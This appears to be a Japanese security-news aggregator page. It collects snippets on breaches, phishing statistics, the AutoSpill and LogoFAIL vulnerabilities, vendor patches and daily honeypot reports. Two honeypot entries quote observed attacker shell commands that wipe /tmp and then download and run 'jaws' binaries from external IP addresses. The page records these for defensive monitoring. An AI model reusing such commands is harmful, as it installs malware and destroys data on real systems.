カシオの ICT教育アプリ「ClassPad.net」への不正アクセス、人的ミス抑止システムの未整備が原因に挙がる | ScanNetSecurityカシオ計算機株式会社は11月8日、10月18日に公表した同社のICT教育アプリ「ClassPad.net」への不正アクセスについて、続報を発表した。 同社では10月11日夕方に、担当者が「ClassPad.net」開発環境での作業を試みた際にデータベースでの障害が発覚したことで、「ClassPad.net」開発環境のデータベースへの外部からのサイバー攻撃を把握、個人情報漏えいの可能性があることを確認していた。
Android「Google ドライブ」不正行為を通知から報告可能に
Android 版「Google ドライブ」アプリにおいてフィッシング詐欺などの不正行為を通知から不正行為報告可能に 不正に共有されたファイルにアクセスできなくなったとしても不正行為を行ったユーザーをブロック可能 長期の段階的展開で 2024 年 1 月完了予定 Google は 2023 年 12 月 8 日(金)、オンラインストレージサービス「Google ドライブ」の Android 版アプリにおいて、フィッシング詐欺などの不正行為に対し通知から不正報告をできるようにする新機能を提供開始しました。 「Google ドライブ」を悪用した不正行為は、当サイトでも以前報告させていただいていまが、「Google ドライブ」のファイル共有機能を悪用し、ヌード写真などで下心を刺激してフィッシングサイトに誘導するフィッシング詐欺です。
ハッキング被害を受けた遺伝子検査ツールの23andMeが利用規約を突然更新、顧客による集団訴訟の提起を禁止
遺伝子検査ツールの23andMeがハッキング被害に遭い、約690万人分の顧客の遺伝的データやプロフィール情報が漏えいした問題で、23andMeはハッキング被害を受けた顧客が23andMeに対して集団訴訟を起こすことができないように利用規約を変更しました。 Legal - Terms of Service - 23andMe International https://www.23andme.com/en-int/legal/terms-of-service/ 23andMe frantically changed its terms of service to prevent hacked customers from suing https://www.engadget.com/23andme-frantically-changed-its-terms-of-service-to-pre
フィッシング対策協議会 Council of Anti-Phishing Japan | 報告書類 | 月次報告書 | 2023/11 フィッシング報告状況
フィッシング報告件数 2023 年 11 月にフィッシング対策協議会に寄せられたフィッシング報告件数 (海外含む) は、前月より 72,456 件 減少し、84,348 件となりました。 フィッシングサイトの URL 件数 2023 年 11 月のフィッシングサイトの URL 件数 (重複なし) は、前月より 2,829 件減少し、10,678 件となりました。 フィッシングに悪用されたブランド件数 2023 年 11 月のフィッシングに悪用されたブランド件数 (海外含む) は、前月より 5 件減少し、73 件となりました。 総評 2023 年 11 月のフィッシング報告件数は 84,348 件となり、2023 年 10 月と比較すると 72,456 件、約 46.2 % と、大きく減少しました。 前月に引き続き Amazon をかたるフィッシングの報告が多く、報告数全体の約 26.7 %
「Android」向けパスワードマネージャーから認証情報が漏えいする恐れ
複数の「Android」向けパスワードマネージャーに影響する、認証情報の漏えいにつながる恐れのある脆弱性が明らかになった。 この脆弱性「AutoSpill」は、先週開催された「Black Hat Europe 2023」カンファレンスで、国際情報技術大学ハイデラバード校(IIITH)の研究チームによって報告された。 AutoSpillは、Androidが「WebView」経由でログインページを呼び出す際に問題となる(WebViewは、ウェブブラウザーを開かなくても、アプリにウェブコンテンツを表示できるようにするOSの機能)。その場合、WebViewによって、アプリは呼び出されたウェブページのコンテンツを表示する。 その際にパスワードマネージャーを利用した場合、認証情報がWebViewだけでなく、アプリにも共有される可能性があるという。研究チームは、アプリのログインに外部サービスのアカウント
IoT機器の脆弱性を3ステップで可視化、キーサイトの検査ツール
IoT機器の脆弱性を3ステップで可視化、キーサイトの検査ツール:サイバー攻撃の増加に備える(1/2 ページ) キーサイト・テクノロジーは「EdgeTech+ 2023」で、IoT(モノのインターネット)機器におけるセキュリティの脆弱性を容易に可視化できるテストツール「IoT Security Assessment」を展示した。既知と未知、両方の脆弱性を確認できるという。 キーサイト・テクノロジー(以下、キーサイト)は「EdgeTech+ 2023」(2023年11月14~17日、パシフィコ横浜)で、IoT(モノのインターネット)機器のサイバーセキュリティを自動的にチェックするツール「IoT Security Assessment」を展示した。併せて記者説明会を実施し、Keysight TechnologiesのSenior Director of the Application and T
Android向けパスワードマネージャーに共通する脆弱性。認証情報が漏えいする恐れ | スラド セキュリティ
Android向けの複数のパスワードマネージャーに影響する脆弱性「AutoSpill」が発見された。この脆弱性により認証情報が漏えいする懸念が出ているという。この脆弱性は、Androidが「WebView」を介してログインページを呼び出す際に発生する。WebViewがアプリに呼び出されたウェブページのコンテンツを表示するため、パスワードマネージャーを利用する際に認証情報がWebViewだけでなくアプリにも共有される可能性があるという(AutoSpill[PDF]、CNET Japan)。 報告によれば、影響を受けるパスワードマネージャーには「1Password」「LastPass」「Enpass」「Keeper」「Keepass2Android」が含まれる。さらにJavaScriptインジェクションを介して情報が共有された場合は、「Dashlane」「Google Smart Lock」も
【セキュリティ ニュース】Fortinet、セキュリティアドバイザリ12件を公開 - 深刻な脆弱性にも対応(1ページ目 / 全2ページ):Security NEXT
Fortinetは、現地時間12月12日にセキュリティアドバイザリをリリースし、同社製品が影響を受ける複数の脆弱性について明らかにした。「クリティカル(Critical)」とされる脆弱性も含まれる。 同社製品にOSとして搭載されている「FortiOS」において、認証されたユーザーが悪用できるダブルフリーの脆弱性「CVE-2023-41678」、APIリクエストを介して不正なコードやコマンドを実行できる「CVE-2023-36639」をはじめ、、同社複数製品における12件の脆弱性について明らかにしたもの。 なかでも「FortiMail」の特定環境下でログインをバイパスし、管理者としてアクセスが可能となる脆弱性「CVE-2023-47539」については、同社において重要度を5段階中もっとも高い「クリティカル(Critical)」とレーティングした。 重要度が2番目に高い「高(High)」とされ
2023/12/06 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/12/06分です。 特徴 共通 zgrabによるスキャン行為 /.envへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP CensysInspectによるスキャン行為 curlによるスキャン行為 /.awsへのスキャン行為 configファイルへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 curlによるスキャン行為 .cssへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 を確認しました。 Location:UK GPONルータの脆弱性を狙うアクセ
日立ソリューションズ、利用中のソフトウェア部品と脆弱性を一元管理する「SBOM管理サービス」 | IT Leaders
IT Leaders トップ > テクノロジー一覧 > 運用管理 > 新製品・サービス > 日立ソリューションズ、利用中のソフトウェア部品と脆弱性を一元管理する「SBOM管理サービス」 運用管理 運用管理記事一覧へ [新製品・サービス] 日立ソリューションズ、利用中のソフトウェア部品と脆弱性を一元管理する「SBOM管理サービス」 2023年12月12日(火)日川 佳三(IT Leaders編集部) リスト 日立ソリューションズは2023年12月12日、SBOM(ソフトウェア部品表)管理クラウドサービス「SBOM管理サービス」を同年12月13日から販売すると発表した。SBOMを一元管理し、脆弱性情報を検出してサプライチェーンで共有する機能を備えている。価格(税込み)は年額330万円から。 日立ソリューションズの「SBOM管理サービス」は、SBOM(Software Bill of Mater
Operation Blacksmith |ブログ(ほぼこもセキュリティニュース)|(株)コンステラ セキュリティ ジャパン
Operation Blacksmithは、マルウェアによる攻撃キャンペーンにつけられた名前です。 展開しているのは、Lazarusだと考えられています。 これまであまり例のないD programming language(いわゆるD言語)で記述されたマルウェアを展開します。 D言語は、基本的にC言語やC++に似ていて、C言語の高速性はそのままに、Javaのようなオブジェクト指向プログラミングが可能になっています。 そして、多くの環境向けにクロスコンパイルすることが可能となっています。 まだD言語は言語自体が若いのか、コンパイラのバージョンで苦労する部分もあるようですが、使える状態を構築できると魅力的なコンピュータ言語です。 Operation Blacksmithで確認された新しいマルウェアは次のようなものです。 NineRAT このマルウェアは、名前のとおり、リモートアクセストロイです
JVNVU#97499577: エレコム製無線LANルーターにおけるOSコマンドインジェクションの脆弱性
エレコム株式会社が提供する複数の無線LANルーターには、OSコマンドインジェクションの脆弱性が存在します。 WRC-X3000GSN v1.0.2 WRC-X3000GS v1.0.24およびそれ以前のバージョン WRC-X3000GSA v1.0.24およびそれ以前のバージョン
【セキュリティ ニュース】WordPressの開発チーム名乗るフィッシング - 不正プラグインに誘導(1ページ目 / 全2ページ):Security NEXT
コンテンツマネジメントシステム(CMS)である「WordPress」で構築されたサイトの管理者を狙ったフィッシング攻撃が出回っている。「脆弱性パッチ」に見せかけ、悪意あるプラグインをインストールさせようとしていた。 DefiantのWordfence脅威分析チームによれば、送信元として「WordPress」の開発チームを名乗り、脆弱性の警告に見せかけたフィッシングメールが出回っているという。 メールの本文では、WordPressセキュリティチームが受信者のウェブサイトに脆弱性を発見したなどと記載。リモートよりコードを実行され、情報を窃取されるおそれがあるなどと不安を煽っていた。 無関係のCVE番号「CVE-2023-45124」を示しつつ、深刻な脆弱性を解消できるよう次期アップデートを準備しているなどともっともらしく説明。同脆弱性の悪用を防ぐためなどとして、リンク先よりすぐにプラグインをイ
JVNVU#90984676: UEFI実装に組み込まれた画像処理ライブラリにおける複数の脆弱性
影響を受けるシステムについては、CERT/CC VU#811862のVendor Informationを参照してください。 多くのUEFI実装では、ブート処理の初期段階においてEFIシステムパーティション(ESP)に保存されているブートロゴ画像を読み込み、画面に表示させています。この画像処理を行うライブラリは複数のベンダにより開発され様々なUEFI実装に組み込まれていますが、それらの画像処理ライブラリに複数の脆弱性が発見されています。 本脆弱性を悪用する攻撃手法は発見者により「LogoFAIL」と呼称されています。 当該ライブラリが用いられるUEFI実装により脆弱性の影響は様々ですが、脆弱性が悪用された場合、ESPパーティションまたはファームウェアに対する管理権限を持つローカルの攻撃者によって、次のような影響を受ける可能性が考えられます。 UEFIのセキュリティ機能(Secure Boo
「iOS 17.2」配信開始 機械学習採用の「ジャーナル」アプリが利用可能に
米Appleは12月11日(現地時間)、「iOS 17.2」を含む一連の製品のOSアップデートの配信を開始した。本稿ではiOS 17.2の新機能とセキュリティ関連の更新を紹介する。 今回のアップデートで、6月のWWDCで発表した機能の多くが実装される。 オンデバイスの機械学習機能を使って日記の入力をサポートするアプリ「ジャーナル」が利用可能になる。Appleは「日常の瞬間や生活の特別な出来事をキャプチャして書くことができ、写真、ビデオ、音声録音、場所などを含めて豊かな思い出を作成できる」と説明する。 「iPhone 15 Pro」および「iPHone 15 Pro Max」の場合は、アクションボタンに翻訳オプションを割り当てられるようになる。これで、必要なときにすぐ翻訳アプリを起動できる。 この他、「メッセージ」で会話内の最初の未読メッセージにジャンプするための矢印の追加、フキダシにスタン
2023/12/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/12/05分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP Spring Bootの脆弱性を狙うアクセス fasthttpによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.dockerへのスキャン行為 /.gitへのスキャン行為 WordPressへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス curlによるスキャン行為 WordPress Pluginへのスキャン行為 configファイルへのスキャン行為
ユーザ端末から5G通信インフラが攻撃されるリスク:5GコアのASN.1に潜む脆弱性|トレンドマイクロ
オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら
【EGセキュアソリューションズ株式会社】「脆弱性診断内製化支援」に新コースを追加「Web脆弱性診断内製化スキャナ併用コース」提供開始
【EGセキュアソリューションズ株式会社】「脆弱性診断内製化支援」に新コースを追加「Web脆弱性診断内製化スキャナ併用コース」提供開始~AeyeScanを活用し、自社で脆弱性診断を完結できる体制の実現をサポート~ イー・ガーディアン株式会社(https://www.e-guardian.co.jp/ 東京都港区 代表取締役社長:高谷 康久 以下、イー・ガーディアン)のグループ会社であるEGセキュアソリューションズ株式会社(https://www.eg-secure.co.jp/ 東京都港区 代表取締役:高谷 康久 以下、EGセキュアソリューションズ)は、株式会社エーアイセキュリティラボ(https://www.aeyesec.jp/ 東京都千代田区 代表取締役社長:青木 歩 以下、エーアイセキュリティラボ)が提供するクラウド型Webアプリケーション脆弱性診断ツール「AeyeScan」を活用し
家電に対して適切な補償に入ることで修理コストを下げて生活を安定させる - izm_11's blog
概要 エンジニアに限らず、現代の暮らしはドラム式洗濯機や高価なスマートフォン、PCなどを使用することが多いです。 そしてそれらはメーカー保証が1年で、それを越える延長保証は各社様々なサービスがあり、選択肢もいろいろあります。(メーカー独自の延長保証、家電量販店の延長保証、クレジットカード付帯の動産保険など) 最近それらを調べて、個人的にオススメ(つまり、おそらく保険料に対して修理の期待値的に得しそうなもの)が幾つかあったので紹介をします。 忙しい人向けに結論を書くと以下です。 ドラム式洗濯機を使っているなら→くらしTEPCOの住設・家電修理サービス https://www.service.tepco.co.jp/s/Warranty_set/ 10万円以上のスマートフォンを買うなら→スマホケ https://sumahoke.jp/ くらしTEPCOの住設・家電修理サービス 東京電力が提供
Gmailの新スパム規制対応全部書く
[2024年1月10日、19日追記] GmailとYahoo!側のアップデートに合わせていくつか細かい説明を追加しています(大筋は変わっていません)。変更点だけ知りたい方は「追記」でページ内検索してください。 2023年10月3日、Googleはスパム対策強化のため、Gmailへ送るメールが満たすべき条件を2024年2月から厳しくすると発表しました。また米国Yahoo!も、2024年2月 第一四半期[1] から同様の対策を行うと発表しています。端的に言えば、この条件を満たさないと宛先にメールが届かなくなるという影響の大きな変更です。 この記事では、Gmailや米国Yahoo!の規制強化への対応方法を解説します。ただし米国Yahoo!にメールを送る人は多くないと思うので、フォーカスはGmail寄りです。また、メール配信サービス(海外だとSendGridやAmazon SES、国産だとblas
自動車の脆弱性情報をどう共有し、どう生かすか|J-Auto-ISAC SOCの歩み
自動車が多機能化するにつれて、かつてはフィクションの中の話だった自動車へのサイバー攻撃が現実化しています。リスクが高まる中で自動車のセキュリティを確保するには業界全体の取り組みが必要です。そんな背景から2021年に設立されたのがJ-Auto-ISACです。中でも情報収集・分析センター(セキュリティオペレーションセンター:SOC)では、企業をまたいだ脅威・脆弱性情報の共有を推進しており、NDIASも活動を支援しています。 J-Auto-ISACの活動開始から約2年を経たいま、自動車を取り巻く脅威はどう変化し、どのような課題があるのか、J-Auto-ISAC SOCセンター長の井上弘敏 氏、副センター長 青山昌寛 氏をお招きし、NDIAS自動車セキュリティ部の中尾将吾、上松亮介、高木辰則がお話をうかがいました。 競争ではなく協調領域|脅威・脆弱性情報の共有は自動車業界では自然な流れ J-Aut
【セキュリティ ニュース】「WordPress 6.4.2」が公開に - 脆弱性の修正を実施(1ページ目 / 全1ページ):Security NEXT
コンテンツマネジメントシステム(CMS)である「WordPress」の開発チームは、現地時間12月6日に最新版となる「同6.4.2」をリリースした。 開発チームでは、今回のリリースをメンテナンスおよびセキュリティリリースと位置づけている。コア部分に明らかとなったバグ7件を修正したほか、セキュリティに関する1件の修正も含まれる。 今回修正された脆弱性は、コアにおいて直接悪用できないものの、一部プラグインを利用する環境においてリモートよりコードを実行されるおそれがある。特にマルチサイトで利用している場合に影響が大きいとしている。 12月11日の時点でアップデートのリリースは「同6.4」系統のみで、他系統へのリリースはなかった。開発チームは利用者に対して早急に更新を行うよう呼びかけている。 (Security NEXT - 2023/12/11 ) ツイート
2023/12/04 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/12/04分です。 特徴 共通 /.envへのスキャン行為 Location:JP CensysInspectによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 Apache Tomcatへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US GPONルータの脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 infrawatchによるスキャン行為 zgrabによるスキャン行為 Gh0stRATのような動き を確認しました。 Location:UK GPONルータの脆弱性を狙う
2023/12/03 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/12/03分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス .jsへのスキャン行為 /.awsへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 112.124.42.80に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; wget http://193.222.96.26/jaws.arm; chmod 777 jaws.arm; ./jaws.arm jaws.rep; cd /tmp; rm -rf *; wget
2023/12/02 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/12/02分です。 特徴 共通 CensysInspectによるスキャン行為 infrawatchによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス fasthttpによるスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:US /.gitへのスキャン行為 configファイルへのスキャン行為 を確認しました。 Location:UK NetG
JVNVU#96961218: Apache Struts 2における外部からアクセス可能なファイルの脆弱性(S2-066)
JVNVU#96961218 Apache Struts 2における外部からアクセス可能なファイルの脆弱性(S2-066) The Apache Software Foundationが提供するApache Struts 2には、外部からアクセス可能なファイルの脆弱性が存在します。
JVNVU#98954443: Edgecross 基本ソフトウェア Windows版における複数の脆弱性
一般社団法人Edgecrossコンソーシアムが提供するEdgecross 基本ソフトウェア Windows版には、複数の脆弱性が存在します。 CVE-2023-0286 Edgecross 基本ソフトウェア Windows版 ECP-BS1-W 1.10 から 1.28 までのバージョン 開発者用 Edgecross 基本ソフトウェア Windows版 ECP-BS1-W-D 1.10 から 1.28 までのバージョン CVE-2022-4304 Edgecross 基本ソフトウェア Windows版 ECP-BS1-W 1.00 から 1.28 までのバージョン 開発者用 Edgecross 基本ソフトウェア Windows版 ECP-BS1-W-D 1.00 から 1.28 までのバージョン CVE-2018-25032 Edgecross 基本ソフトウェア Windows版 ECP-
Krasue |ブログ(ほぼこもセキュリティニュース)|(株)コンステラ セキュリティ ジャパン
Krasueというリモートアクセストロイの活動が観測されています。 どんなものなのでしょうか。 初期感染経路 どういった経路で侵入するモノなのかについては、まだ確認されていません。 普通に想像すると、脆弱性の悪用、不正なダウンロード、資格情報のブルートフォース攻撃などの方法で初期感染を実現する可能性が考えられます。 隠れる機能 Krasueには隠れるための機能が複数実装されています。 ルートキットというものがあります。 これは、作動中のプロセスやファイルやシステムデータを隠蔽する狙いがあり、ユーザに察知させることなく侵入者がシステムへのアクセスを維持することを支援するものです。 このルートキットは多くの実装があり、また多くのルートキットはソースが公開されています。 このKrasueには、3つのルートキットの機能が含まれています。 Diamorphine、Suterusu、Rootyの3つで
【セキュリティ ニュース】「Apache Struts」にアップデート - 「クリティカル」の脆弱性に対応(1ページ目 / 全1ページ):Security NEXT
ウェブアプリケーションフレームワーク「Apache Struts」の開発グループは、現地時間12月7日に最新版となる「同6.3.0.2」「同2.5.33」をリリースした。 同バージョンでは、ファイルのアップロード機能においてパストラバーサルの脆弱性「CVE-2023-50164」を修正した。脆弱性を悪用されるとリモートよりコードを実行されるおそれがある。 脆弱性の最大重要度を4段階中もっとも高い「クリティカル(Critical)」とレーティングしている。 開発グループでは、同バージョンへアップデートするよう強く呼びかけている。 (Security NEXT - 2023/12/08 ) ツイート
AndroidのパスワードマネージャーからWebViewを悪用して資格情報を盗み出せる脆弱性「AutoSpill」が発見される
2023年12月にロンドンで開催されたセキュリティカンファレンス「Black Hat Europe」で、Androidのパスワードマネージャーから資格情報を盗み出すことを可能にする「AutoSpill」という脆弱(ぜいじゃく)性について、インドのハイデラバード国際情報技術大学の研究チームが発表しました。 AutoSpill: Credential Leakage from Mobile Password Managers | Proceedings of the Thirteenth ACM Conference on Data and Application Security and Privacy https://dl.acm.org/doi/10.1145/3577923.3583658 Your mobile password manager might be exposing y
2023/12/01 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/12/01分です。 特徴 共通 CensysInspectによるスキャン行為 zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP Spring Bootの脆弱性を狙うアクセス /.awsへのスキャン行為 configファイルへのスキャン行為 phpMyAdminへのスキャン行為 を確認しました。 Location:US PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス Spring Bootの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス /.awsへのスキャン行為 /.gitへのスキャン行為 WordPress Pluginへのスキャン行
PC起動時のUEFIで表示されるロゴ画像を置き換えて任意のコード実行を可能にするエクスプロイト「LogoFAIL」が発見される、WindowsとLinuxが対象でどんなセキュリティもスルーしてしまう
WindowsあるいはLinuxを実行するデバイスの起動に関わるUEFIに発見された24個の脆弱(ぜいじゃく)性を攻撃するエクスプロイト「LogoFAIL」を、セキュリティ企業のBinarlyが発表しました。 Finding LogoFAIL: The Dangers of Image Parsing During System Boot | Binarly – AI -Powered Firmware Supply Chain Security Platform https://binarly.io/posts/finding_logofail_the_dangers_of_image_parsing_during_system_boot/index.html Just about every Windows and Linux device vulnerable to new Logo
Pixelに12月の月例更新 3件の「致命的」含む脆弱性修正と多数のバグ修正、改善、新機能も追加
米Googleは12月6日(現地時間)、Pixelの月例セキュリティ情報の12月版を公開した。多数のバグ修正と改善も行われる。 Googleは同日、12月の「Feature Drops」として多数の新機能を紹介しているが、それらについては別記事を参照されたい。新機能は向こう数週間にわたって展開していく見込みだ。 バグ修正と機能改善は以下の通り。()内は対象となるモデル。()がない場合は更新対象の全モデルが対象だ。 特定のシステムアプリの安定性またはパフォーマンスに関する全般的な改善(8/8 Pro) 特定の条件下での通話中に補聴器と電話をペアリングする際に問題が発生する問題の修正 充電とバッテリーの使用に関する全般的な改善(8/8 Pro/Fold/Tablet) 特定の条件下で常時表示ディスプレイが有効になっている場合の初回試行時の指紋の問題の修正(6/6 Pro/6a/7/7 Pro/
2023/11/30 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/11/30分です。 特徴 共通 TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP /.gitへのスキャン行為 5.188.210.227に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 121.62.21.23/jaws; sh /tmp/jaws Location:US Joomla!の脆弱性(CVE-2023-23752)を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス CensysInspectによるスキャン行為 aiohttpによるスキ
ランサムウェア対策への脆弱性診断の有効性
多くの被害が出ているランサムウェアに対し、脆弱性診断は有効な対策手段の 1 つです。システムに内在する脆弱性を明らかにする事で、適切な対策を行うことを可能とします。 1.ランサムウェアに対する脆弱性診断の有効性 ランサムウェアとは、パソコンやサーバーなどに感染または侵入し、ファイルに対して暗号化処理を行い読み書き不可能な状態にした上で、もとに戻すための金銭(=身代金)を要求するような悪質なマルウェアを指します。 2023 年上半期におけるランサムウェアによる被害件数は 103 件(出典:警察庁「令和5年上半期におけるサイバー空間をめぐる脅威の情勢等について」)と、引き続き高い水準で推移しており、主な感染経路として、メールの添付ファイルやリンク、Web サイトのブラウジング、USB メモリなどのリムーバブルメディアの接続、リモートデスクトップでのアクセスなど、日常の企業活動にてよく行われる行
1番目に想起されるDXを支えるテック企業へ。さくらインターネットが目指す未来 | さくマガ
さくらインターネットがあったから、学生時代にウェブサイトを作れた。さくらインターネットがあったから、やりたいことができた。そう感じているユーザーは多いのではないだろうか。だが、中年の郷愁にのみ想起されるようなサービスは、いつかレガシーになる。 会社設立から 6年で上場してからも常に変革を求め、時代に寄り添い続けてきたさくらインターネット。いまのリアルな姿を、さくらインターネットの執行役員であり副社長の舘野 正明さんに聞いた。 日本のインターネットを支えるサービスを次々と開発 舘野 正明(たての まさあき)プロフィール さくらインターネット株式会社 副社長 兼 執行役員。茨城県出身。金沢大学経済学部卒業後、味の素株式会社に入社し、国内食品事業を中心に営業を 10年経験。2002年にさくらインターネットに入社し、2004年に執行役員就任。以降、 ほぼすべての事業・サービスに企画担当・事業責任者
LLMの出力における問題は「LLMの処理が原因」とは限らない プロンプト以外に考えられる4つの要因
「FastLabel × LayerX × LINE 3社が語る『生成AI×プロダクト開発』で直面する課題と乗り越え方」は、生成AIをプロダクト開発にどのように活用しているか、その際に直面した課題と克服するためのアプローチなどをFastLabel、LayerX、LINEのエンジニアが共有するイベントです。ここで株式会社LayerXの中村氏が登壇。ここからは、LLMの精度評価における、LLMの処理以外で考えられる原因分析について話します。前回はこちらから。 精度評価 中村龍矢氏:では具体的に、精度評価と改善にいければと思います。 まず精度評価というと、パッとイメージしやすいのが、「どういうスコアをやるか」というところで。これは最近はツールもノウハウもいろいろ出ているので、あまり悩むことはないんじゃないかなと思っています。LLMが吐いた答えが正しいかどうかを判定する方法ですね。 一番シンプルな
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
【セキュリティ ニュース】ワイン通販サイトに不正アクセス - 個人情報流出の可能性(1ページ目 / 全2ページ):Security NEXT
【セキュリティ ニュース】学習支援システムから学生情報が流出した可能性 - 名古屋芸大(1ページ目 / 全1ページ):Security NEXT
【セキュリティ ニュース】ランサムウェアによるデータ暗号化被害が発生 - アイテス(1ページ目 / 全1ページ):Security NEXT
日立ソリューションズ、ソフトウェア部品表を一元管理する「SBOM管理サービス」を提供
「Zoom」に最大深刻度「High」の脆弱性 ~最新版では修正済み/Windows版クライアントでパストラバーサルの脆弱性により権限昇格の恐れ
【セキュリティ ニュース】Apple、「macOS Sonoma 14.2」をリリース - 脆弱性40件に対応(1ページ目 / 全1ページ):Security NEXT
【セキュリティ ニュース】Adobe、「Illustrator」など複数製品の脆弱性を解消(1ページ目 / 全1ページ):Security NEXT
今年最後の「Windows Update」、CVE番号ベースで33件の脆弱性へ新たに対処/深刻度が最高の「Critical」は4件
【セキュリティ ニュース】Apple、「iOS 17.2」などを公開 - 複数脆弱性を修正(1ページ目 / 全2ページ):Security NEXT
【セキュリティ ニュース】MS、月例パッチを公開 - 34件の脆弱性に対応(1ページ目 / 全2ページ):Security NEXT
2023 年 12 月のセキュリティ更新プログラム (月例) | MSRC Blog | Microsoft Security Response Center
「LibreOffice」に任意のスクリプトが実行可能になる可能性のある危険な脆弱性/「LibreOffice 7.6.4/7.5.9 Community」への更新を
エレコムのWi-Fiルーター「WRC-X3000GSN」など3製品に脆弱性、対策済みファームウェアに更新を 
【セキュリティ ニュース】FXC製の情報コンセント型無線LANルータに脆弱性 - 悪用の動きも(1ページ目 / 全1ページ):Security NEXT
【セキュリティ ニュース】QNAP、「QTS」や「QVR」などの脆弱性に対処(1ページ目 / 全1ページ):Security NEXT
【セキュリティ ニュース】「MS Edge」にセキュリティアップデート - 独自の脆弱性修正も(1ページ目 / 全1ページ):Security NEXT
【セキュリティ ニュース】Google、ブラウザ最新版「Chrome 120」を公開 - 脆弱性を解消(1ページ目 / 全1ページ):Security NEXT
「Microsoft Edge 120」が正式版に ~すみずみまでサンドボックス化、セキュリティアップ/脆弱性の修正は8件、最大深刻度「High」
DX推進におけるセキュリティリスクの例と対策を解説 - さくマガ
カスペルスキー、ニーズが高い機能に絞ってコストを低減した法人向け脅威モニタリングサービス「DFM」
【セキュリティ ニュース】Atlassianの複数製品に脆弱性 - 重要度は「クリティカル」(1ページ目 / 全2ページ):Security NEXT
Apple、WebKitのゼロデイ脆弱性に対処した「iOS 16.7.3」「iPadOS 16.7.3」を公開/Webコンテンツの処理で任意コード実行、機密情報漏えいの恐れ